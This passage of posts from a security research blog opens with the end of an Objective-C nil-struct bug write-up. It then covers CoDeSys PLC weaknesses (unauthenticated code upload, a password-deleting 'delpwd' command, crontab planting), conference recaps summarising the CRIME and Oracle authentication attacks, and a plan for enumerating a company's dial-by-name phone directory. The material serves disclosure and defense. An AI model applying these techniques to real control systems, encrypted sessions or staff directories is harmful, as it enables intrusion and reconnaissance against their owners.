LLVM GCC

sh-3.2# strings Info.plist | grep compiler
com.apple.compilers.llvmgcc42

GCC

sh-3.2# strings Info.plist | grep compiler
sh-3.2#

What are the take-home notes here? Basically, if you use a method that returns a structure type, check the object against nil first! Even if you know YOU'RE not going to be using a mid-2011 version of Xcode, if you post your library on GitHub or similar, how do you know your code is not going to end up in a widely used banking product, for example – whose developers may still be using a slightly older version of Xcode, perhaps even due to corporate policy?
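A guard as small as this, reusing the names from the example above, is enough:

struct teststruct result = {0};  /* zeroed default in case the receiver is nil */
if (hw != nil) {
    result = [hw sayHello];      /* only message a non-nil pointer */
}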

It’d therefore be a decent idea to include this class of bugs on your secure code review checklist for iOS applications.

Thanks for reading.

Shaun.

[1] http://www.opensource.apple.com/source/objc4/objc4-532/runtime/Messengers.subproj/objc-msg-arm.s

[2] http://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/WhatsNewXcode/Articles/xcode_4_1.html

[3] https://developer.apple.com/library/mac/#documentation/Cocoa/Reference/Foundation/Miscellaneous/Foundation_DataTypes/Reference/reference.html

P.S. I’ve heard that Objective-C apps running on PowerPC platforms can also be vulnerable to such bugs – except with other return types as well, such as float and long long. But I can’t confirm that, since I don’t readily have access to a system running on the PowerPC architecture.

INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

 

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreters/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX's talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

 

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

 

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

 

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

 

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

 

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

 

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.
INSIGHTS | October 24, 2012

The WECC / NERC Wash-up

Last week in San Diego, IOActive spoke at both the Western Electricity Coordinating Council (WECC) and NERC GridSec (GridSecCon) conferences. WECC is primarily an auditor audience and NERC-CIP is compliance-focused, while GridSecCon is the community and technical security authority for the electricity industry in the U.S. There was a great turnout for both conferences, with more than 200 attendees across three days per conference. IOActive security researcher Eireann Leverett presented "The Last Gasp of the Industrial Air-Gap…" at WECC and participated in a discussion panel on industry best practice for grid security at GridSecCon.

WECC
An auditors' forum – what can I say, other than they do have a great sense of humor [they got Eireann's Enron corporate-failure joke], apparently enjoy a drink like everyone else, and definitely need our help and perspective when it comes to understanding the disparity between being compliant and being secure. Day 1 was a closed session for WECC members only, where they discuss god only knows what. Day 2 was where IOActive got involved, with the morning session focusing on cyber security and explaining in a little more detail the security challenges the industry faces, aligned to CIP audit and compliance programmes. Eireann, Jonathan Pollet, and Tom Parker all gave great talks, which some could argue were a little too technical for the audience, but they were well received nonetheless. More work is definitely needed with forums such as WECC and the NERC standards council to ensure the gap between CIP compliance and the actual state of energy security is further reduced.
GridSecCon
The audience at GridSecCon was anything but a single area of expertise like we saw at the WECC conference. I engaged with folks from security, engineering, risk management, consulting, audit and compliance, and technology backgrounds. From that, it's fair to say the Industrial Control System and Energy sector is a red-hot opportunity for new rules, new products, new ideas…and new failures! Eireann was in fine form again on the panel – which was made up of consulting, product vendor, and government representatives – throwing in a quote from Trotsky, the Russian Marxist revolutionary.

I laughed, but I'm not sure the rest of the crowd appreciated the irony. European humor at work 🙂. I didn't see as much as I would have liked on the supply chain side of things, including the term "security of supply," which is widely used in Europe. More work is definitely needed in these areas, and it is something I will look at in 2013.
Day 1 saw some interesting talks on social engineering threats and a panel discussion on malware threats to the sector. Awareness of the threat of social engineering in the energy sector is clearly on the rise. Positively, it seemed organizations were placing more emphasis [I said more, not enough] on educating SCADA operations staff about phishing and telephony-based attacks. Tim Roxey from NERC oversaw the malware panel as participants openly discussed the threat of new malware targeting the energy sector, in particular the effects of SQL Slammer on SCADA systems and a review of the recent attack on Saudi Aramco (the Shamoon malware). It was unclear whether the SCADA networks at Saudi Aramco were affected, but obviously there are similar challenges in store as SCADA and corporate networks continue to converge. The incident also triggered an unprecedented response exercise involving reviews of up to 120 of Saudi Aramco's plant sites across the Middle East region.

 
Day 2 was kicked off by an excellent keynote talk by Admiral Thad Allen [retired], US Coast Guard, on incident response and his view of the challenges national infrastructure security is facing in the US, which could easily be applied globally. Undeniably, Admiral Allen said complexity is the biggest challenge we face in securing existing and new national infrastructure. His talk gave examples from his experience in dealing with incidents such as Hurricane Katrina in New Orleans – in particular, the importance of defining exactly what the problem is before even thinking about how to respond to it. Not correctly understanding the problem when coordinating a response could mean an expensive and ineffective solution, which is exactly where the energy sector sits today – "stop admiring the problem, start working on the solution."

Technical vs. Risk Management – the age-old conundrum
It still surprises me, after 15-odd years of our industry coming to the forefront and an estimated 50+ billion dollar spend on technical security measures, that the topic of technical vs. risk management continues to come up at these conferences. If technical solutions were security nirvana, we wouldn't be worried about anything today, would we? Of course we need both areas, and each is as important as the other. Sure, the technical stuff may seem more interesting, but if we can't sell the importance of what the tech tells us in a business language, the overall security of the energy industry will continue to struggle for traction. Likewise, the perceived notion that compliance with standards like CIP, ISO 27000, etc. keeps us safe at night will continue to skew the real picture unless we can talk tech, risk, and compliance at the same time.
What are the conferences missing?
Maybe I don't attend enough conferences, and I understand client sensitivities in sharing this sort of information, but what these conferences need more of is a view from the field – what is actually going on beneath all the conversations about risk management, compliance, and products. Again, stop admiring the problem: admit we have one by analyzing what's actually going on in the field, and use this to inform programmes of work to solve the issues. We know what good looks like; only talking about it is as useful in the real world as a chocolate teapot…
Key Take Aways
Did I learn anything new? Of course I did. However, a lot of the core messages, like "we need to talk tech and risk management" and "sector-wide information sharing", continue to be old wine in new bottles for me, especially while governments set strict rules on whom they value information from [who they deem appropriate] and how it can be shared [at their approval]. And it's a little troubling to see a whole industry sector, with all its concerns around the security of national infrastructure, still trying to understand the importance of risk management or the gaps between compliance and actual security. That said, WECC and NERC are clearly making concerted efforts to move things in the right direction.
Wicked Problems and Black Swans [Day 2 keynote, Admiral Thad Allen]: again, a great talk by Admiral Allen with some great perspective. A wicked problem: something we know is there but don't have an answer to [lack of utility investment in grid security]. A black swan: an outcome so dire it doesn't seem likely [grid failure/compromise].

 

As I see it, we need to be more vocal in participating in the sector forums and share [in a generic fashion] what we are seeing in the field, which should further inform organizations like WECC and NERC with a view to continued security improvement across the sector.
 San Diego is hot, the Tex Mex food is great…and I’ll hopefully see you all at WECC & NERC in 2013!
INSIGHTS | October 11, 2012

SexyDefense Gets Real

As some of you know by now, the recent focus of my research has been defense. After years of dealing almost exclusively with offensive research, I realized that we have been doing ourselves an injustice as professionals. We do eventually get to help organizations protect themselves (with the mindset that the best way to learn defense is to study offensive techniques), but nevertheless, when examining how organizations practice defense, one has a feeling of missing something.
For far too long the practice (and art?) of defense has been entrusted to bureaucrats and was lowered down to a technical element that is a burden on an organization. We can see it from the way that companies have positioned defensive roles: “firewall admin,” “IT security manager,” “incident handler,” and even the famous “CISO.” CISOs have been getting less and less responsibility over time, basically watered down to dealing with the network/software elements of the organization’s security. No process, no physical, no human/social. These are all handled by different roles in the company (audit, physical security, and HR, respectively).
This has led to the creation of the marketing term “APT”: Advanced Persistent Threat. The main reason why non-sophisticated attackers are able to deploy an APT is the fact that organizations are focusing on dealing with extremely narrow threat vectors; any threat that encompasses multiple attack vectors that affect different departments in an organization automatically escalates into an APT since it is “hard” to deal with such threats. I call bullshit on that.
As an industry, we have not really been supportive of the defensive front. We have been pushing out products that deal mainly with past threats and are focused on post-mortem detection of attacks. Anti-virus systems, firewalls, IDS, IPS, and DLP – these are all products that are really effective against attacks from yesteryears. We ignore a large chunk of the defense spectrum nowadays, and attackers are happily using this against us, the defenders.
When we started SexyDefense, the main goal was to open the eyes of defensive practitioners, from the hands-on people to executive management. The reason for this is that this syndrome needs to be fixed throughout the ranks. I already mentioned that the way we deal with security in terms of job titles is wrong. It’s also true for the way we approach it on Day 1. We make sure that we have all the products that industry best practices tell us to have (which are from the same vendors that have been pushing less-than-effective products for years), and then we wait for the alert telling us that we have been compromised for days or weeks.
What we should be doing is first understanding what we are protecting! How much is it worth to the organization? What kinds of processes, people, and technologies "touch" those assets, and how do they affect them? What kinds of controls are there to protect such assets? And ultimately, what are the vulnerabilities in processes, people, and technologies related to said assets?
These are tough questions – especially if you are dealing with an “old school” practice of security in a large organization. Now try asking the harder question: who is your threat? No, don’t say hackers! Ask the business line owners, the business development people, sales, marketing, and finance. These are the people who probably know best what are the threats to the business, and who is out there to get it. Now align that information with the asset related ones, and you get a more complete picture of what you are protecting, and from whom. In addition, you can already see which controls are more or less effective against such threats, as it’s relatively easy to figure out the capabilities, intent, and accessibility of each adversary to your assets.
Now, get to work! But don’t open that firewall console or that IPS dashboard. “Work” means gathering intelligence on your threat communities, keeping track of organizational information and changes, and owning up to your home-field advantage. You control the information and resources used by the organization. Use them to your advantage to thwart threats, to detect intelligence gathering against your organization, to set traps for attackers, and yes, even to go the whole 9 yards and deal with counterintelligence. Whatever works within the confines of the law and ethics.
If this sounds logical to you, I invite you to read my whitepaper covering this approach [sexydefense.com] and participate in one of the SexyDefense talks at a conference close to you (or watch the one given at DerbyCon online: http://www.youtube.com/watch?v=djsdZOY1kLM).
If you have not yet run away, think about contributing to the community effort to build a framework for this, much like we did for penetration testing with PTES. Call it SDES for now: Strategic Defense Execution Standard. A lot of you have already been raising interest in it, and I’m really excited to see the community coming up with great ideas and initiatives after preaching this notion for a fairly short time.
Who knows what this will turn into?
INSIGHTS | October 2, 2012

Impressions from Ekoparty

Another ekoparty took place in Buenos Aires, Argentina, and for a whole week Latin America had the chance to meet and get in touch with the best researchers on this side of the world.
A record-breaking 150 entries were received and analysed by the excellent academic committee formed by Cesar Cerrudo, Nico Waisman, Sebastian Muñiz, Gerardo Richarte, and Juliano Rizzo.
More than 1500 people enjoyed 20 talks without any interruption – except when the Mariachis played.
Following last year's ideas, when ekoparty became the last bastion of resistance in the rebellion against the machines, this resistance had to move off the earth to fight the battle of knowledge sharing in another world.
IOActive accompanied us again with their whole research team and an excellent stand that included a bar and bartender throughout the event. IOActive went further and also sponsored the VIP dinner to honor all exhibitors, organizers, and sponsors, who accepted the challenge: Argentine asado vs. tacos, prepared by their own research team. It was a head-to-head contest, but the home advantage was that the meat was from Argentina 🙂

 

We would like to thank all the researchers, participants, and sponsors who contribute to ekoparty's growth! See you next year to find out how this story goes on!

By Jennifer Steffens @securesun

For those who know me, I'm no stranger to the world of conferences and have attended both big and small cons around the world. I love experiencing the different communities and learning how different cultures impact the world of security as a whole. I recently had the pleasure of attending my second Ekoparty in Buenos Aires with IOActive's Latin American team, and it was again one of my all-time favorites.

To put it simply, I am blown away by both the conference and the community. Francisco, Federico and crew do an amazing job from start to finish. The content is fresh and innovative. They offer all the great side acts that con attendees have grown to love – CTF, lock picking stations, giant robots with lasers, a computer museum as well as the beloved old school Mario Brothers game. Even the dreaded vendor area is vibrant and full of great conversations – as well as a bit of booze thanks to both our bar service and Immunity’s very tasty beer!

But the real heart of Ekoparty is the community. The respect and openness that everyone brings to the experience is refreshing and gives the conference a very “family-like” feel – even with 1500 people. I met so many interesting people and spent each day engaged in inspiring conversations about the industry, the culture and of course, how to be a vegetarian in Argentina (not easy AT ALL!).

A special thanks to Federico and Francisco for the invitation and generous VIP treatment throughout the week. It was a great opportunity for us to bring IOActive’s Latin American team together, which now includes 12 researchers from Argentina, Brazil, Colombia and Mexico; as well as meet potentially new “piratas” in the making. I am amazed every day at what that team is able to accomplish and am already looking forward to Ekoparty 2013 with an even bigger team of IOActive “piratas” joining us.

¡Gracias a los organizadores, speakers y asistentes de la Ekoparty 2012. La semana fue fantástica y espero verlos el año que viene!

 

By Cesar Cerrudo @cesarcer

 

This was my 5th time presenting at Ekoparty (I missed just one Ekoparty, when my son was born 🙂). Ekoparty is one of my favorite conferences; I feel like a part of it, and it's in my own country, which makes it special for me. It's nice to get together with all the great Argentinean hackers – who, by the way, are very good and many – and with a lot of friends and colleagues from around the world. Over the years I have seen the growth in quality and quantity, and I can say that this conference is currently at the same level as the biggest and best-known ones, and every year it gets better.

 

This year I had the honor of giving the opening keynote, "Cyberwar para todos", where I presented my thoughts and views on the global cyberwar scenario and encouraged people to research the topic and reach their own conclusions.

 

We sponsored a VIP dinner where speakers, sponsors, and friends enjoyed a great night with some long-awaited Mexican tacos! We also had a nice booth with free coffee service in the morning and an open bar after noon; I don't think it's necessary to stress that it was a very, very popular booth 🙂

 

The talks were great, and a lot of research was presented for the first time at Ekoparty; just take a look at recent news and you will see that this is not just “another” conference. The last time I remember a security/hacking conference generating this much related news coverage was Black Hat/Defcon. We could say Ekoparty is becoming one of the most important security/hacking conferences in the world.

 

 By Stephan Chenette @StephanChenette

OK, I’ll try my best to follow Cesar (this year’s keynote speaker), Francisco (one of the founders of EkoParty), and Jennifer (our CEO) in giving an impression of the EkoParty conference. If you haven’t been to EkoParty, stop what you’re doing right now, check out the web site (http://ekoparty.org), and set yourself a reminder to buy a plane ticket and an entry ticket for next year – because this is a con worth attending. If nothing else you’ll learn, or confirm what you had thought for years: that the Latin American hacker community is awesome, and you should be paying attention to their research if you haven’t been already.

Three days long, EkoParty is composed of a CTF, a lock-picking area, trainings, and 20 interesting talks on research and security findings. The venue is something you’d expect from CCC or PH-Neutral: an industrial, bare-bones building loaded up with ping-pong tables and massive computing power, with no shortage of smoke machines, lights, and crazy gadgets on stage… oh, and as you read above in Francisco’s summary, a mariachi band (hey, it is Argentina!).

The building reminded me of the elaborate Faraday cage Gene Hackman had set up in the movie Enemy of the State to hide from surveillance – except EkoParty was filled with around 1,500 attendees and organizers.

IOActive sponsored a booth and tried their best to provide the attendees with as much quality alcohol as possible =]
 

Our booth is where I spent most of my time when not seeing talks, so that I could hang out with IOActive’s Latin American team members, who hail from Mexico, Brazil, Colombia, and Argentina.

I saw a number of talks while at EkoParty, but I’m sure most of you will agree the three most noteworthy talks were:
    • CRIME (Juliano Rizzo and Thai Duong)
    • Cryptographic Flaws in Oracle Database Authentication Protocol (Esteban Fayó)
    • Dirty Use of USSD Codes in Cellular Networks (Ravi Borgaonkar)
I won’t go into details on the above talks, as more information is now available online about them.
I was lucky enough to be accepted as a speaker this year, presenting research focused on defeating network and file-system detection. My past development experience is in threat detection, but as I stated in my presentation: you must think offensively when creating defensive technology, and you must not oversell it by glossing over its limitations – a mistake most salespeople at security companies make these days.
I spent about 75% of my time reviewing various content-detection technologies from the last 20 years and explaining each one’s limitations. I then talked about the use of machine learning and natural language processing for both exploit and malware detection, as well as attribution.
Machine learning, like any technology used in defense, has its limitations, and I tried to explain my point of view on the importance of having not only a layered defense, but a well-thought-out layered defense that makes sense for your organization.
As I stated in my presentation, attackers typically go through several stages to pull off a full attack and successfully exfiltrate data:

 

    • Recon (intelligence gathering)
    • Penetration (exploitation of defenses)
    • Control (staging a persistent mechanism within the network)
    • Internal recon
    • Exfiltration of data
In my presentation I looked at the reality in offensive techniques against detection technologies: Attackers are going to stay just enough ahead of the defense curve to avoid detection.

 

(Stephan Chenette’s presentation on “The Future of Automated Malware Generation”)
For example, with Gauss and Zeus we’ve seen DLLs encrypted with a key found only on the targeted machine, and downloaded binaries encrypted with information from the infected host. Encrypting binaries with target information essentially prevents any behavioral sandbox from running the binary outside of its intended environment.
So maybe attackers of the future will only make incremental improvements to thwart detection, or maybe we’ll start seeing anti-clustering and anti-classification techniques added to the attacker’s arsenal as machine learning is added as another layer of defense. The future is of course unknown, but I do have my suspicions.
In my concluding slides I stressed that there is much room for improvement in detecting a threat before it strikes, and that a defensive strategy should be layered in a manner that forces the attacker to spend time, resources, and different skill levels at each layer, hopefully exposing enough of himself or herself in the process to give the targeted organization enough time to mitigate the threat, if not halt the attack altogether.
This was by far the largest crowd I’ve ever spoken in front of, and it goes down as one of the best conferences I’ve attended. Thanks again, EkoParty committee, for inviting me to present – I’ll try my best to be back next year!!





By Ariel Sanchez

 

At Ekoparty we had the opportunity to attend presentations showing a high level of innovation and creativity.

 

Here are some personal highlights:

 

 *The CRIME Attack presentation by Juliano Rizzo and Thai Duong
 *Trace Surfing presentation by Agustín Gianni
 *Cryptographic flaws in Oracle Database authentication protocol presentation by Esteban Fayó

 

I can’t wait to see what is coming in the next ekoparty!

 

 

By Tiago Assumpcao @coconuthaxor

 

If my memory is accurate, this was my fourth EkoParty. From the first one until now, the numbers related to the conference have grown beyond my imagination. In another respect, though, EkoParty remains the same: it has the energetic blood of Latin American hackers – plenty of them, actually. Buenos Aires has a magical history of producing talent like nowhere else, and the impressive numbers and quality of EkoParty today definitely have to do with that magic.

 

There were many great talks on a wide range of topics. I will summarize the ones I most appreciated, being forced to leave aside the ones I didn’t have the chance to catch.

 

Cyberwar para todos: I’ve seen people complain about this topic, either because it’s political (rather than technical) or because it has “been stressed too much” already. In my opinion, one can’t ignore how the big empires think about information security. Specifically, here is what I liked about this talk: the topic might have been stressed in North America, but the notion of cyberwar, per Gen. Keith Alexander’s vision, is still unknown to most in South America. A few years ago the Brazilian CDCiber (Cyber Defense Centre) was created and, despite effort coming directly from the President, the local authorities are still very naïve, to say the least, compared to their rich cousins. Cesar raises questions about that.

 

Satellite baseband mods: Taking control of the InmarSat GMR-2 phone terminal, this was probably my favorite talk. They showed how a user can easily modify satellite phones at will, poking data that comes in and out of the device. Furthermore, the presenters showed how communication technologies very similar to GSM, when applied over a different medium, can open whole new vectors of potential attacks. Finally, Sebastian “Topo” Muniz is one of the most hilarious speakers in the infosec industry.

 

Trace Surfing, this is one of those rare talks that resolve hard problems with very simple solutions. Agustín showed how one can retrieve high-level information about the Windows heap, during the course of an execution trace, simply by tracking ABI specifics at call-sites of choice. The simplicity of his solution also makes it really fast. Great work!

 

PIN para todos (y todas), basically Pablo Sole created an interface that allows one to write Pin-based tools to instrument JavaScript. I heard it’s impressively fast.

 

What I really wanted to have seen, but couldn’t…

 

OPSEC: Because Jail is for wuftpd, unfortunately, they had Grugq speaking at 9am. I can’t digest humour so early and will have to ask him for a secondhand presentation.

 

Literacy for Integrated Circuit Reverse Engineering, very sadly, I didn’t catch Alex’s presentation. But if you are into reverse engineering modern devices, I would recommend it with both my eyes closed, nonetheless.

 

 

By Lucas Apa @lucasapa

What began publicly as an e-zine early in the century has now become the most important Latin American security conference: ekoparty. The whole Latin American team landed in Buenos Aires to spend an amazing week.
My ekoparty week started on Monday, when I was invited to attend a Malware Analysis Training by ESET after solving a binary-unpacking challenge posted on their blog. The first two intensive days were dedicated to paid trainings covering the following topics: cracking, exploiting, SAP security, penetration testing, web security, digital forensics, and threat defense. Every classroom was almost fully booked.

The conference started on Wednesday at the Konex Cultural Center, one of the most famous cultural centers for music and events; the building was an oil factory some decades ago.
On Wednesday our CTO, Cesar Cerrudo, gave the main keynote of the day.
Many workshops were open to any conference attendee for the rest of the day.

At night we enjoyed a classic “Mexican grill” at IOActive’s party, to which VIP guests were invited. The meal was brought to you by Alejandro Hernández and Diego Madero, our Mexican security consultants.
Thursday and Friday were the most awaited days, since the presentations were going to start.

My favorite talks were:

*Taking control of the InmarSat GMR-2 phone terminal (Sebastian Muñiz and Alfredo Ortega): Without modifying the firmware image, the researchers managed to send AT commands to the phone terminal to write arbitrary memory. They injected binary instrumentation code for logging and hooking what the phone really sends during common actions like sending an SMS. They then overwrote the “data” section to redirect the control flow at a chosen point, and discovered that messages sent to the satellite “might” be vulnerable to “memory corruption” if the satellite preprocesses them before retransmission. No satellites were harmed.

*VGA Persistent Rootkit (Nicolás Economou and Diego Juarez): Showed a new combination of techniques for reliably modifying the firmware of a VGA card to execute code or add new malicious basic blocks.

*CRIME (Juliano Rizzo and Thai Duong): The most awaited talk revealed a new chosen-plaintext attack in which compression lets an attacker recognize which sequences of bytes are already present in the TLS data. The attack works like BEAST, with two requirements: the ability to capture the victim’s encrypted traffic and control of the victim’s browser through a web vulnerability (or a MITM position on an HTTP service). By forcing the browser to place specific guessed strings in the HTTP resource location, they observed that if that portion of the guess already appears in the cookie, the TLS data compresses better. Repeated byte by byte, this allows brute-forcing the piggybacked cookie that is automatically added to the request.
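
As a toy illustration of the compression-oracle idea (my own sketch, not the presenters’ code), you can watch zlib reward a correct guess of the next cookie byte with a smaller compressed size:

import zlib

secret = "Cookie: secret=S3CR3T"  # hypothetical cookie the browser appends

def compressed_len(guess):
    # attacker-controlled path plus the victim's cookie, compressed together
    # before encryption, as with TLS/SPDY compression
    return len(zlib.compress(("GET /" + guess + " HTTP/1.1\r\n" + secret).encode()))

for ch in "RSTU":
    print(ch, compressed_len("Cookie: secret=" + ch))

The correct next byte (“S”) usually compresses a byte shorter than the wrong guesses, so repeating the measurement recovers the cookie one byte at a time.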

*The Future of Automated Malware Generation (Stephan Chenette): Our Director of R&D showed the different approaches AVs take to detecting malware, and how they mostly fail. It is difficult to defend ourselves against something we don’t know, and we must remember that attackers are also having fun with machine learning!

*Cryptographic flaws in Oracle DB auth protocol (Esteban Fayó): When authenticating a user, Oracle uses the stored password hash (from the database) as the key for encrypting the random server session key. The client hashes its password and tries to decrypt the encrypted session key the server returned. The problem is that it is possible to recognize whether this decryption produces invalid padding, so candidate passwords can be tried offline: just brute-force the local decryption until a valid padding occurs (occasionally a wrong candidate collides with a valid padding, but then it’s simply not the password). This vulnerability was reported to Oracle two years ago, but no patch has been provided since.

 

By Alejandro Hernández @nitr0usmx

 

After a 10-hour flight delay, I finally landed in Buenos Aires. As soon as I could, I went straight to the VIP party to meet the IOActive team and to prepare some Mexican tacos and quesadillas (made by Diego Bauche @dexosexo).

 

The next day, Thursday, I had the chance to attend Stephan Chenette’s talk (@StephanChenette), a really interesting presentation about automated malware generation and future expectations. His presentation was well structured: he started with the current state of malware generation/defense, then explained the future of malware generation/defense by way of current malware trends. The same day, I enjoyed Esteban Fayó’s talk (@estemf) because he showed a live demo of how to crack an Oracle password by taking advantage of some flaws in the Oracle authentication protocol.

 

The venue, KONEX, the same as last year, was really cool. There were vendor booths, old computers, and video games (where I spent like two hours playing Super Mario Bros), as well as a cocktail bar – and obviously the IOActive booth ;).

 

In conclusion, I really had a great time with my fellow workers, drinking red wine and eating Argentine asado, on top of the amazing talks.

 

I definitely hope to be there next year.
INSIGHTS | September 26, 2012

Completely Unnecessary Statistical Analysis: Phone Directory

 
Disclaimer: I am not a statistician.

 

A particular style of telephone company directory allows callers to “dial by name” to reach a person, after playing the matching contacts’ names. In the example used here, input must be given as surname + given name, with a minimum of three digits entered on the telephone keypad (e.g., Smith = 764). Since keypad letters map onto only eight digits (2–9), covering all possible three-digit combinations means 8^3, or 512 combinations. With a directory that allowed repeated searches in the same call, it would take about seven hours of dialing – roughly 50 seconds per combination – to cover them all.

 

Let’s use available data to try and reduce the complexity of the problem while increasing the return on effort – like the giant nerds we are.

 

The 2000 U.S. Census provided raw data[1] on over 150,000 surnames occurring 100 or more times in the population. This puts the lowest occurrence of a surname in the data at 1 in 2,500,000. The uncounted surnames[2] represent 10.25% of people counted in the 2000 Census. This means our data only cover 89.75%* of the U.S. population, but we can safely assume† that the remaining names closely follow the patterns established in the data we do have available.

 

In this analysis, the first three characters of each surname in the Census data were converted into a three-digit combination using a telephone keypad conversion function. The resulting data were manipulated using an Excel pivot table to group matching combinations and sum the percentage of occurrence. This resulted in a table that ranked each combination. To facilitate the creation of interactive charts, this data was then imported into a Google Spreadsheet[3].
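
To make the conversion and ranking steps concrete, here is a minimal Python sketch of the same pipeline (my illustration, not the original Excel workflow; the census list is a hypothetical stand-in for the real data file):

from collections import Counter

# Standard keypad: letters map onto digits 2-9 (Q on 7, Z on 9).
KEYPAD = {c: d for d, letters in {"2": "ABC", "3": "DEF", "4": "GHI",
          "5": "JKL", "6": "MNO", "7": "PQRS", "8": "TUV",
          "9": "WXYZ"}.items() for c in letters}

def to_pattern(surname):
    # First three letters of the surname as a three-digit dialing pattern.
    return "".join(KEYPAD[c] for c in surname.upper()[:3])

census = [("SMITH", 0.0088), ("JOHNSON", 0.0069), ("WILLIAMS", 0.0057)]  # stand-in rows

ranks = Counter()
for name, share in census:
    ranks[to_pattern(name)] += share  # group matching patterns, sum occurrence

# Dial in descending rank and track the cumulative share of the population covered.
covered = 0.0
for searched, (pattern, share) in enumerate(ranks.most_common(), 1):
    covered += share
    print(pattern, searched, round(covered * 100, 2), "% covered")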

 

Results Summary

Unsurprisingly, the distribution of surnames for the patterns is non-uniform, with favorable spikes. Sorting by rank, we find the best pattern – 227 – should return 2% of the surnames for the average U.S. company. What’s more exciting is that we can use a smaller amount of effort to achieve a larger than expected amount of results. Searching by ascending rank to return 50% of the surnames, you only need to search 67 patterns, which is 13% of all possible combinations. To return 90% of the surnames you only need to search 241 patterns, which is 47% of all possible combinations. Some milestones are listed in the chart below.

(Chart: coverage milestones by pattern rank.)

The following chart shows the curvilinear relationship of the expected returns versus the effort expended.

(Chart: expected return vs. effort expended.)

Test Case
A test case was performed against an actual U.S. company phone directory, with a medium-sized population that happened to be highly biased to Polish surnames. Approximately 120 names were “randomly” selected based on a known list of employees and the patterns for each were searched. In spite of the bias, the test case correlated well with the expected results.

 

The highest number of surnames (6) was returned by pattern 627 (ranked 3rd), the second highest (5) by pattern 227 (ranked 1st), and the fourth highest (3) by pattern 726 (ranked 5th). These three data points average out to an estimated total population of 300, which is close to the expected size of the company.

 

The U.S. Census includes racial data, which may be helpful in tailoring to certain populations; surname distributions by state would be even more helpful, but those do not appear to be available. A geographic breakdown could have improved results in the test case.

 

Notable Facts
·         Three patterns do not appear in this data: 577, 957, 959.
·         Sorted by rank, the last 10% of surnames require 53% of the effort.
·         Surname data from the 2010 Census was not compiled and is not available.
·         Unlike the U.S., Canada has a large population of 2-letter surnames[4].
·         Canada’s government does not release surname data.

 

Get The Full List

 

Thanks to Nick Roberts of Foundstone for supplying a Canadian point of view on the subject.

 

References
*  Two-letter surnames were excluded. This reduces the coverage of the analysis by 0.25% to 89.50% of the total population, a negligible change. Since entering these surnames would require the first letter of the given name, these should be analyzed separately for the distribution of given names, with some consideration to the biases of ethnicity. The U.S. Census does not consider surnames with one character valid.

 

†  Some references in this document extrapolate the Census data to include 100% of the population for clarity. The spreadsheet[3] available lists percentages of both the sample data and the population as a whole for accuracy.

[1] http://www.census.gov/genealogy/www/data/2000surnames/index.html

[3] https://docs.google.com/spreadsheet/pub?key=0Akoj1-Rq-rX7dFJ4aURZdmJnU1FDQUxlcTVXWGFLTkE&output=html

[4] http://www.cbc.ca/news/background/name-change/common-surnames.html

INSIGHTS | September 11, 2012

Malware Doesn’t Care About Your Disclosure Policy, But You Better Have One Anyway

All over the world, things are changing in ICS security—we are now in the spotlight and the only way forward is, well, forward. Consequently, I’m doing more reading than ever to keep up with technical issues, global incidents, and frameworks and policies that will ensure the security of our future.

From a security researcher’s perspective, one exciting development is that .gov is starting to understand the need for disclosure in some cases. Researchers have found that when they give companies lead time to implement fixes, they often get stonewalled for months or years. Yes, it sometimes takes years to fix specific ICS security issues, but that is no excuse for failing to keep the researcher and ICS-CERT supplied with continually updated timelines. This is well reflected in the document we are about to review.

The Common Industrial Control System Vulnerability Disclosure Framework was published a bit before Black Hat/Defcon/BSidesLV, and I’ve just had some time to read it. The ICSJWG put this together, and I would say that overall it is very informative.

For example, let’s start with the final (and most blogged about) quote of the Executive Summary:

“Inconsistent disclosure policies have also contributed to a public perception of disorganization within the ICS security community.”

I can’t disagree with that—failure to have a policy already has contributed to many late nights for engineers.

On Page 7, we see a clarification of vulnerabilities found during customer audits that is commendable:

“Under standard audit contracts, the results of the audit are confidential to the organization customer and any party that they choose to share those results with. This allows for information to be passed back to the vendor without violating the terms of the audit. The standard contract will also prevent the auditing company from being able to disclose any findings publically. It is important to note however, that it is not required for a customer to pass audit results on to a vendor unless explicitly noted in their contract or software license agreement.”

Is there a vendor who explicitly asks customers to report vulnerabilities in their license agreements? Why/why not?

On Page 9, Section 5 we find a dangerous claim, one that I would like to challenge as firmly and fairly as I can:

